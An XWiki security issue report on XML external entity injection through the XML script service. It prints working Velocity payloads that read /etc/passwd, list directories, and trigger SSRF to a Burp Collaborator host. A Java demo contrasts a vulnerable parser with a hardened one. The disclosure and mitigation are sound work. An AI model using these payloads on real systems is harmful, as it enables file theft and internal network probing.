XWiki Platform: XWIKI-18946

XML External Entity Injection (XXE) through XML script service


Details


    Description

      Any user with Velocity script permission can read arbitrary files, list directories and perform server-side request forgery (SSRF) through the XML script service.

      • Read arbitrary files payload:

      {{velocity}}
      #set($xml=$services.get('xml'))
      #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
      #set($doc=$xml.parse($xxe_payload))
      $xml.serialize($doc)
      {{/velocity}}

      • Directory listing payload:

      {{velocity}}
      #set($xml=$services.get('xml'))
      #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///' >]><root><foo>&xxe;</foo></root>")
      #set($doc=$xml.parse($xxe_payload))
      $xml.serialize($doc)
      {{/velocity}}

      • SSRF payload:

      {{velocity}}
      $services.get('xml').parse("<!DOCTYPE test [ <!ENTITY xxe SYSTEM 'http://ao2r99e546em76d8rliq7hcil9rzfo.burpcollaborator.net/a'> ]>
      <productId>&xxe;</productId >")
      {{/velocity}}
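      The parser behaviour behind these three payloads, shown as an added example in Java (XWiki's implementation language) rather than as XWiki's own code: a JAXP DocumentBuilder built with default settings expands the external entity, so the element text becomes the file content (or, with an http: URL, triggers the outbound request), while a factory that disallows DOCTYPE declarations rejects the same document before any entity is resolved. The class and method names (XxeDemo, parseUnsafe, hardenedFactory, parseSafe) are chosen for this illustration; the payload string is the first one from the report.

```java
import java.io.StringReader;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeDemo {

    // Payload copied from the report: an external general entity pointing at a local file.
    static final String XXE_PAYLOAD =
        "<?xml version='1.0' encoding='UTF-8'?>"
        + "<!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>"
        + "<root><foo>&xxe;</foo></root>";

    // Vulnerable pattern (illustrative, not XWiki's code): JAXP defaults resolve
    // external entities, so &xxe; expands to the referenced file's contents.
    static Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new InputSource(new StringReader(xml)));
    }

    // Hardened factory: reject any DOCTYPE outright (stops XXE and entity-expansion
    // DoS in one step) and, as defence in depth, close every external-fetch path in
    // case a parser ignores the first feature. The feature names are the Xerces/SAX
    // ones the JDK's built-in parser understands; a third-party parser that does not
    // know them throws ParserConfigurationException, which fails closed.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return factory;
    }

    static Document parseSafe(String xml) throws Exception {
        return hardenedFactory().newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        // On a Unix host the first line of /etc/passwd is printed: the file was read.
        Document leaked = parseUnsafe(XXE_PAYLOAD);
        String text = leaked.getDocumentElement().getTextContent();
        System.out.println("unsafe parser expanded &xxe; to: " + text.split("\n")[0]);

        // The hardened parser fails at the DOCTYPE, before any entity is resolved.
        try {
            parseSafe(XXE_PAYLOAD);
            System.out.println("unexpected: hardened parser accepted the payload");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        }
    }
}
```

      Compile and run with `javac XxeDemo.java && java XxeDemo` on a Unix host. Because the hardened factory aborts at the DOCTYPE, it rejects the directory-listing and SSRF payloads from the report in the same way, and the SSRF variant never produces an outbound request, since entity resolution is never reached.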

            People

              tmortagne Thomas Mortagne
              PetrusViet Petrus Viet (a member of VNG Security)